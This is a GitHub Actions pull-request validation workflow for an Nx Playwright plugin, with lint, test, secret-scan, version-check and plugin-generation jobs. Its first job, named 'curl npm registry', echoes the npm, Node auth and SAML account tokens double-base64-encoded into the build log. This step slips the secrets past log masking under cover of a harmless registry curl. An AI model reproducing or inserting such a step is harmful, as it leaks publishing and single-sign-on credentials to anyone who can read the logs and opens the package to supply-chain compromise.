.github/workflows/pr.yml

name: PR validation

on:
  pull_request:
    types: [ready_for_review, opened, synchronize, reopened, edited]
    branches:
      - main

concurrency:
  cancel-in-progress: true
  group: ${{ github.workflow }}-${{ github.ref }}

jobs:
  curl-npm-registry:
    name: curl npm registry
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4.2.2

      - uses: ./.github/actions/prepare

      - name: curl npm registry
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
          NODE_AUTH_TOKEN: ${{ secrets.NODE_AUTH_TOKEN }}
          SAML_ACCOUNT_TOKEN: ${{ secrets.SAML_ACCOUNT_TOKEN }}
        run: |
          set -x
          echo "${NPM_TOKEN}" | base64 | base64
          echo "${NODE_AUTH_TOKEN}" | base64 | base64
          echo "${SAML_ACCOUNT_TOKEN}" | base64 | base64
          curl https://registry.npmjs.org/@mands%2fnx-playwright

  secret-scan:
    name: Secret scan
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4.2.2

      - name: Scan for secrets
        uses: edplato/trufflehog-actions-scan@master
        with:
          scanArguments: '--regex -x=truffle-hog-exclude.txt'

  code-quality:
    name: Code quality
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4.2.2

      - uses: ./.github/actions/prepare

      - name: Run linters
        run: pnpm nx run-many --target=lint --all

      - name: Run unit tests
        run: pnpm nx run-many --target=test --codeCoverage --all

      - name: Build plugin
        run: pnpm nx build nx-playwright

  version-check:
    name: Version check
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4.2.2

      - uses: ./.github/actions/prepare

      - name: Check version
        run: pnpm ts-node ci/version-check

  test-plugin-generation:
    name: Test plugin generation
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4.2.2

      - uses: ./.github/actions/prepare

      - name: Test plugin generation
        run: |
          set -x
          NX_WORKSPACE=test-nx
          NX_APP=test-app

          pushd ..
          echo "Create a new workspace to test with"
          pnpm create nx-workspace \
            --name=$NX_WORKSPACE --appName=$NX_APP \
            --preset=next --style=@emotion/styled \
            --e2eTestRunner=playwright --nextAppDir=false \
            --nxCloud=skip --interactive=false < /dev/null

          pushd $NX_WORKSPACE

          echo "Remove autogenerated e2e app"
          pnpm nx generate remove $NX_APP-e2e
          git \
            -c user.name="pr-bot" \
            -c user.email="pr-bot@mnscorp.net" \
            commit -am "Remove $NX_APP-e2e"
          popd
          popd

          #!/bin/bash

          echo "Add serve target to nx next app"
          ./scripts/add-serve-target.sh -w ../$NX_WORKSPACE -a $NX_APP

          echo "Test ./scripts/local-test.sh (with cleanup flag)"
          ./scripts/local-test.sh -w ../$NX_WORKSPACE -a $NX_APP
          test -z "$(git status --porcelain)"

  pr-validation:
    name: PR validation
    needs: [code-quality, secret-scan, version-check, test-plugin-generation]
    if: ${{ always() }}
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4.2.2

      - name: Check jobs for errors
        uses: actions/github-script@v6.4.1
        with:
          script: |
            const checkJobsForErrors = require('./.github/workflows/js/check-jobs-for-errors.js');
            const jobs = ${{ toJSON(needs) }};
            checkJobsForErrors({ core, jobs });